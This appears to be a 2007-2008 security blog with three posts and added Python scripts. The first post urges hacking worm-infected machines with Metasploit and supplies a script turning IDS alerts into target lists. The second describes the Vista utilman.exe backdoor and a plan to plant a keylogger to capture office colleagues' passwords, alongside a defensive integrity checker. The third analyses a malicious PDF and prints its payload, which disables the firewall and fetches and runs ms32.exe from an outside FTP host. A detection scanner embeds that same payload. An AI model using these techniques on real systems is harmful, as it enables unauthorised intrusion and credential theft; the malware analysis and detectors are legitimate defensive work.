____________________________________________________________
07th January, 2008
Hacking the hacked
I thought it would be worth writing about how to hack into machines that
have already been compromised. Scanning an IP address range to find
vulnerable machines is not ideal: choosing the range, scanning it, querying
the vulnerable hosts and so on takes time and resources, and it tends to set
off alarms somewhere, with your IP address getting logged.
A much better way is to just wait for someone to come and attack you :) Yes,
viruses and worms are our best friends in this case. Chances are these
infected machines are still not patched, which is why they got infected in
the first place.
There are a number of steps you will need to take:
1. Firstly, make sure your machine is fully patched.
- You do not want to be the victim here :)
2. Install intrusion detection/prevention software.
- This will tell you which vulnerability the worm is trying to exploit and
will give you added protection.
3. Put your machine in the DMZ so that it receives external traffic.
- If you are using a modem then chances are your IP address is already
externally facing.
4. Disable the Windows firewall.
- If it is enabled then all inbound traffic will be blocked and your
intrusion detection software will not see any malicious traffic.
You will be amazed how often your machine gets hit by worms exploiting
vulnerabilities, some of them over four years old. What is more surprising is
that these infected machines still have not been patched :)
Once you have gathered a few IP addresses, take a moment to check whether
each machine is still vulnerable using a single-vulnerability scanner tool.
Once confirmed, just load up Metasploit and do your stuff.
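The harvesting step above can be automated. As an added example (not code from the original post), the script below reads Snort-style "fast" alert lines from the IDS, keeps only inbound priority-1 exploit attempts aimed at our own box, and groups the attacking hosts by the signature they fired, which is what tells you which vulnerability (and so which Metasploit module) to try against them. The alert lines, SIDs and signature names are constructed for the example; 198.51.100.7 is the assumed address of the box sitting in the DMZ.

```python
"""Turn IDS alerts into a target list.

Added example, not code from the original post.  Reads Snort 'fast' alert
lines, keeps inbound priority-1 alerts aimed at our own box and groups the
attacking sources by the signature that fired.  All sample lines, SIDs and
signature names are constructed; OUR_IP is an assumption.
"""
import re
from collections import defaultdict

OUR_IP = "198.51.100.7"  # assumed address of the machine sitting in the DMZ

# Constructed alerts in Snort fast-alert layout (not real captures).
SAMPLE_ALERTS = """\
01/06-22:14:03.112233  [**] [1:100001:1] NETBIOS DCERPC overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.45:3741 -> 198.51.100.7:135
01/06-22:15:41.778899  [**] [1:100002:1] NETBIOS SMB-DS LSASS overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.45:3802 -> 198.51.100.7:445
01/06-22:21:09.000001  [**] [1:100001:1] NETBIOS DCERPC overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.0.2.19:1025 -> 198.51.100.7:135
01/06-22:30:55.500500  [**] [1:100003:2] ICMP PING sweep [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.0.2.200 -> 198.51.100.7
01/06-22:31:12.123123  [**] [1:100001:1] NETBIOS DCERPC overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 198.51.100.7:3001 -> 192.0.2.77:135
"""

# timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {proto} src[:port] -> dst[:port]
ALERT = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<sid>[\d:]+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)


def parse_alert(line):
    """Return the alert's fields as a dict, or None for lines that are not alerts."""
    m = ALERT.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["prio"] = int(d["prio"])
    d["dport"] = int(d["dport"]) if d["dport"] else None  # ICMP alerts carry no port
    return d


def harvest(lines, our_ip=OUR_IP, max_priority=1):
    """Map attacking source IP -> {'signatures': [...], 'ports': [...], 'alerts': n}.

    Only inbound alerts (destination is our_ip) at or above max_priority count;
    our own outbound traffic and low-priority scans are dropped.
    """
    hits = defaultdict(lambda: {"signatures": set(), "ports": set(), "alerts": 0})
    for line in lines.splitlines():
        a = parse_alert(line)
        if a is None or a["dst"] != our_ip or a["prio"] > max_priority:
            continue
        entry = hits[a["src"]]
        entry["signatures"].add(a["msg"])
        if a["dport"] is not None:
            entry["ports"].add(a["dport"])
        entry["alerts"] += 1
    return {src: {"signatures": sorted(e["signatures"]),
                  "ports": sorted(e["ports"]),
                  "alerts": e["alerts"]}
            for src, e in hits.items()}


def targets_by_signature(harvested):
    """Invert the harvest: signature name -> sorted list of hosts that fired it."""
    inv = defaultdict(set)
    for src, e in harvested.items():
        for sig in e["signatures"]:
            inv[sig].add(src)
    return {sig: sorted(hosts) for sig, hosts in inv.items()}


if __name__ == "__main__":
    for sig, hosts in targets_by_signature(harvest(SAMPLE_ALERTS)).items():
        print(f"{sig}: {', '.join(hosts)}")
```

Everything up to the Metasploit step is automated here; the check with a single-vulnerability scanner is still done by hand against each host in the list before you try anything back.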

The best way to protect yourself from being compromised this way is to sit
behind a NAT router. This will stop unsolicited inbound external traffic from
reaching your internal boxes.
____________________________________________________________
23rd November, 2007
Windows Vista Backdoor Logon
The backdoor method works by abusing the "Ease of Access" button at the
bottom left of the Windows Vista logon screen. Normally, if you click the
icon you get a choice of options such as Narrator, Magnifier, etc.
The way to exploit this is to replace any one of the programs behind those
options with your own. If magnify.exe were replaced with cmd.exe, then
selecting the Magnifier option would bring up a console window, and because
the logon screen launches these helpers before anyone has logged on, that
console runs as SYSTEM.
Obviously, in order to replace such Windows files you first need to log on
to the system with admin rights, take ownership of the file and then replace
it with one of your own.
If you ever forget your logon password you can use this backdoor method to
reset the password, or connect to a remote share and copy your files off.
The files you can replace to get the backdoor working are:
magnify.exe, narrator.exe, osk.exe or utilman.exe
utilman.exe is the main program: it brings up the Ease of Access window,
which in turn launches the others.
Suppose you want to capture someone's logon credentials. Normally, even with
local admin rights on the box, the majority of key logging tools do not
intercept keystrokes at the Ctrl+Alt+Del stage, whether the tool was loaded
at boot as a service or as a program, because the logon screen runs on a
separate secure desktop that ordinary user-mode hooks cannot reach.

This backdoor method works a treat in an office environment for capturing
passwords:
1. Remotely connect to a desktop machine.
2. Replace a file, say utilman.exe, with your key logger.
3. Walk up to the desk and click on the "Ease of Access" button.
Now just wait for the user to log on to capture the credentials :). Once the
user is logged in, the key logger terminates.
The Windows API function GetAsyncKeyState() is all it takes to write a key
logger and is the easiest option.
One way to mitigate the risk is to make sure utilman.exe (and the other
accessibility executables) cannot be replaced or executed in place of the
originals. Various products on the market can lock this down.
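A lightweight version of that lockdown check, as an added example that is not code from the original post or from any of the products it mentions: record SHA-256 hashes of the four accessibility programs plus cmd.exe, then report any that changed, went missing, or became a byte-for-byte copy of cmd.exe (the classic swap). The System32 path is an assumption, and simulate_swap() builds a throwaway directory with constructed stand-in files so the check can be exercised on any OS.

```python
"""Integrity check for the Ease of Access binaries the Vista logon backdoor swaps.

Added example, not code from the original post.  snapshot() hashes the
watched files, check() compares a live directory against a saved snapshot,
and simulate_swap() exercises the check on constructed stand-in files.
DEFAULT_SYSTEM32 is an assumption; pass your own path.
"""
import hashlib
import os
import tempfile

WATCHED = ("utilman.exe", "magnify.exe", "narrator.exe", "osk.exe")  # named in the post
CLONE_SOURCE = "cmd.exe"                       # what the backdoor copies over them
DEFAULT_SYSTEM32 = r"C:\Windows\System32"      # assumed location


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(system32):
    """Hash every watched file that exists; missing files are recorded as None."""
    snap = {}
    for name in WATCHED + (CLONE_SOURCE,):
        path = os.path.join(system32, name)
        snap[name] = sha256_of(path) if os.path.isfile(path) else None
    return snap


def check(system32, baseline):
    """Compare the live directory against a saved snapshot.

    Returns (file, problem) pairs: 'changed' when the hash differs from the
    baseline, 'missing' when the file is gone, and 'clone-of-cmd.exe' when an
    accessibility binary now hashes identically to cmd.exe, whatever the
    baseline said.
    """
    live = snapshot(system32)
    problems = []
    for name in WATCHED:
        if live[name] is None:
            problems.append((name, "missing"))
            continue
        if live[name] != baseline.get(name):
            problems.append((name, "changed"))
        if live[CLONE_SOURCE] is not None and live[name] == live[CLONE_SOURCE]:
            problems.append((name, "clone-of-" + CLONE_SOURCE))
    return problems


def simulate_swap():
    """Constructed demo: baseline a fake System32, then copy 'cmd.exe' over utilman.exe.

    Returns (problems_before_swap, problems_after_swap).
    """
    d = tempfile.mkdtemp()
    # Constructed file contents standing in for the real binaries.
    fake = {n: n.encode() + b"-stand-in" for n in WATCHED + (CLONE_SOURCE,)}
    for name, body in fake.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(body)
    baseline = snapshot(d)
    before = check(d, baseline)
    with open(os.path.join(d, "utilman.exe"), "wb") as f:  # the backdoor swap
        f.write(fake[CLONE_SOURCE])
    after = check(d, baseline)
    return before, after


if __name__ == "__main__":
    before, after = simulate_swap()
    print("before swap:", before)
    print("after swap: ", after)
```

Against a real box you would take the baseline once, after patching, and run check() from a scheduled task. Note that a copied cmd.exe still carries its valid Microsoft Authenticode signature under the new name, so a signature check on its own would pass the swapped file; the hash comparison against cmd.exe is what catches it.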
Reference:
http://www.computerperformance.co.uk/vista/vista_backdoor_logon.htm
____________________________________________________________
14th November, 2007
Windows URI protocol handling vulnerability
This is an interesting vulnerability that was first published at the end of
July 2007 but only really brought to light at the end of October 2007, when
spammers started exploiting it by sending a specially crafted URI (Uniform
Resource Identifier) containing a "%" character and ending with a certain
extension (e.g. ".bat" or ".cmd").
Installing Internet Explorer 7 on Windows XP or Server 2003 changes the way
Windows handles URIs. This change introduced a flaw that can cause Windows to
incorrectly determine the appropriate handler for the protocol specified in
a URI: a string that starts with a registered scheme but contains a "%" and
ends in ".cmd" or ".bat" is handed to the command interpreter instead of the
scheme's handler.
In other words, it is an input validation error in the handling of URIs with
registered URI handlers (e.g. "mailto", "news", "nntp", "snews", "telnet"
and "http").
Adobe Reader and Firefox are two of the applications that have been used as
attack vectors to reach this vulnerability.
The actual malicious PDF file that was spammed, which was brought to my
attention, was called "report.pdf" and was only 3,919 bytes in size.
Here is the embedded code, which makes it obvious what it does:
<</URI(mailto:%/../../../../../../windows/system32/cmd".exe"" /c /q \"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>
As you can see, the remote code execution was beautifully crafted. Here are
the steps it takes:
1. netsh firewall set opmode mode=disable
- disables the Windows firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7
- writes an ftp command script (open the host, switch to binary mode, get
the file, quit) to a file called 7.
3. ftp -s:7 -v -A>nul
- runs the script via ftp, logging in anonymously (-A), which downloads the
malware called ms32.exe.
4. del /q 7
- deletes the script.
5. start ms32.exe
- finally executes the malware ms32.exe.
6. GAME OVER :)
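As an added example, not code from the original post: a small scanner that pulls every /URI action string out of a PDF, decodes it using the PDF literal-string escaping rules so the real closing parenthesis is found, flags URIs of the shape the spam run used (a "%" in the body, "../" traversal and a trailing .cmd or .bat name) and splits the cmd.exe /c payload into the individual commands listed above. The sample PDF object is constructed around the /URI string quoted above; its object numbers and the benign second URI are made up.

```python
"""Find URI-handler-confusion payloads inside a PDF.

Added example, not code from the original post.  extract_uris() pulls every
/URI action string out of raw PDF bytes, decoding literal-string escapes so
the real closing ')' is found; is_handler_confusion() flags the shape used
in the October 2007 spam run; command_chain() splits the cmd.exe /c payload
into its commands.  SAMPLE_PDF is constructed around the /URI string from
the post; the object numbers and the benign second URI are made up.
"""
import re

SAMPLE_PDF = rb"""%PDF-1.4
1 0 obj
<</URI(mailto:%/../../../../../../windows/system32/cmd".exe"" /c /q \"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>
endobj
2 0 obj
<</URI(http://example.invalid/report)/S/URI>>
endobj
"""

URI_KEY = re.compile(rb"/URI\s*\(")
SHELL_HANDOFF = re.compile(rb"\.(cmd|bat)\s*$", re.IGNORECASE)  # tail that cmd.exe gets
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}


def _octal(b):
    return len(b) == 1 and b in b"01234567"


def read_literal_string(data, start):
    """Decode the PDF literal string whose '(' is at data[start].

    Unescaped parentheses nest, a backslash escapes the next character
    (\\n, \\(, \\ddd octal, ...) and an unknown escape just drops the
    backslash.  Returns (decoded bytes, index just past the closing ')').
    """
    out, depth, i = bytearray(), 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            nxt = data[i + 1:i + 2]
            if nxt in _ESCAPES:
                out += _ESCAPES[nxt]
                i += 2
            elif _octal(nxt):
                j = i + 1
                while j < i + 4 and _octal(data[j:j + 1]):
                    j += 1
                out.append(int(data[i + 1:j], 8) & 0xFF)
                i = j
            else:
                out += nxt
                i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:      # the opening parenthesis itself
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
        out += c
        i += 1
    raise ValueError("unterminated PDF literal string")


def extract_uris(pdf):
    """All /URI strings in the document, decoded."""
    uris, pos = [], 0
    while True:
        m = URI_KEY.search(pdf, pos)
        if m is None:
            return uris
        uri, pos = read_literal_string(pdf, m.end() - 1)
        uris.append(uri)


def is_handler_confusion(uri):
    """Shape of the exploit: '%' and '../' in the body and a .cmd/.bat tail."""
    return b"%" in uri and b"../" in uri and SHELL_HANDOFF.search(uri) is not None


def command_chain(uri):
    """Commands after 'cmd /c [switches]', split on '&'; stops at the first
    filler segment that is only quotes, backslashes and spaces."""
    text = uri.decode("latin-1")
    m = re.search(r"/c\s+(?:/\w+\s+)*(.*)", text, re.DOTALL)
    if m is None:
        return []
    cmds = []
    for part in m.group(1).split("&"):
        part = part.strip(' \\"@')
        if not part:
            break
        cmds.append(part)
    return cmds


def scan_pdf(pdf):
    """One finding per malicious URI: the decoded URI and its command list."""
    return [{"uri": u, "commands": command_chain(u)}
            for u in extract_uris(pdf) if is_handler_confusion(u)]


if __name__ == "__main__":
    for finding in scan_pdf(SAMPLE_PDF):
        print("malicious URI:", finding["uri"][:60].decode("latin-1") + "...")
        for n, cmd in enumerate(finding["commands"], 1):
            print(f"  {n}. {cmd}")
```

The parser only looks at literal strings in plain (uncompressed) objects, which is what this sample used; a PDF whose objects sit inside a FlateDecode stream would need the stream inflated first.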
McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163
Updates for Adobe Reader and Firefox have been released which mitigate this
vulnerability.
Microsoft finally released an update on the 13th of November (MS07-061)
which updates the shell32.dll library that handles the URIs.
References:
http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2007-102318-0451-99&tabid=1
http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx